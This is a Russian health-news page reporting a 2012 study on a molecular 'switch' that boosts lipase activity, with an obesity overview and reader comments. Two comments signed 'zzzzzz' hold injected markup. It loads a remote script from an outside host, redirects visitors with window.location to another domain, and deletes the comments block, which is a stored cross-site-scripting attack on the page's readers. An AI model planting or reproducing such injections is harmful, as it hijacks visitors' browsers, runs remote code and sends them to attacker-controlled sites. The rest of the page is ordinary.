Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые нашли новый способ...  >>  Ученые нашли новый способ похудения
 
Обратная связь
 

Ученые нашли новый способ похудения

Размер шрифта
12 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Датские ученые обнаружили молекулярный «выключатель», который увеличивает эффективность работы ферментов, расщепляющих жир, в три раза.

похудение

Что такое ожирение

Ожирение – это хроническое заболевание, проявляющееся увеличением массы тела за счет накопления жировой ткани. В норме в нашем организме постоянно поддерживается баланс между поглощенной и затраченной энергией. Ожирение развивается в том случае, когда поглощенная энергия превышает затраченную.

Развитию ожирения способствуют следующие факторы:

  • малоподвижный образ жизни;
  • генетическая предрасположенность;
  • легкоусвояемые углеводы, избыток которых откладывается в виде триглицеридов в жировой ткани;
  • эндокринные заболевания.

Ожирение опасно тем, что оно является фактором риска различных заболеваний: сахарного диабета, сердечно-сосудистых заболеваний и рака.

История вопроса

Ранее ученые считали, что ферменты работают непрерывно: меняется только эффективность их работы. Однако на самом деле ферменты довольно «ленивые» создания. В течение определенного времени они работают с одной и той же эффективностью, а затем «отдыхают».

Функция фермента зависит от формы его молекулы. Для того чтобы сделать работу фермента более эффективной, необходимо существенно изменить его форму. В некоторых случаях это сделать практически невозможно. Поэтому ученые пришли к выводу, что целесообразнее менять не форму фермента, а продолжительность его работы.

Суть исследования

Для проведения исследования ученые выбрали липазу – фермент, расщепляющий жиры. Каждый раз, когда фермент начинал работать, жир испускал свет, что позволяло ученым наблюдать за работой фермента.

Как говорилось выше, изменение формы фермента с целью увеличения его эффективности нецелесообразно, поэтому ученые решили увеличить продолжительность работы фермента. С помощью молекулярного «выключателя» им удалось увеличить продолжительность работы липазы в три раза.

Результаты

Полученные результаты свидетельствуют о том, что, по всей видимости, молекулярный «выключатель» есть не только у липазы, но и у многих других ферментов. Если работу ферментов можно будет регулировать точно так же, как показано в данном исследовании, то ученые смогут понять суть различных заболеваний и разработать соответствующее лечение.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Мандаринка

12 октября 2012 в 13:50

Цитировать   |   Пожаловаться

Интересно, какие только последствия будут после такого лечения.

2 - Мандаринка

12 октября 2012 в 13:50

Цитировать   |   Пожаловаться

лет наверное через 5 узнаем)     

3 - Гость

12 декабря 2012 в 23:08

Цитировать   |   Пожаловаться

Я считаю, что практически все попытки ученых без вреда вмешаться в работу человеческого организма, с целью подчинить его работу -тщетны и в итоге оказывают только вред. Здоровое и правильное питание - один из основополагающих факторов хорошего состояния здоровья

4 - Гость

23 января 2014 в 17:48

Цитировать   |   Пожаловаться

Здравствуйте мои дорогие. Я если честно не верю что этот способ принесет свои плоды. 

5 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 23:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Новый препарат для снижения веса   Мифы о снижении веса   Можно ли сбросить вес после родов?   Как ваши подруги мешают вам худеть!  
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 

Слайдшоу

1
Перекусы: меньше 100 ккал в порции. Часть 1
Супереда для похудения. Часть 2
Супереда для похудения. Часть 1

Тесты

1
Знаете ли вы, как работает ваш желудок?
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.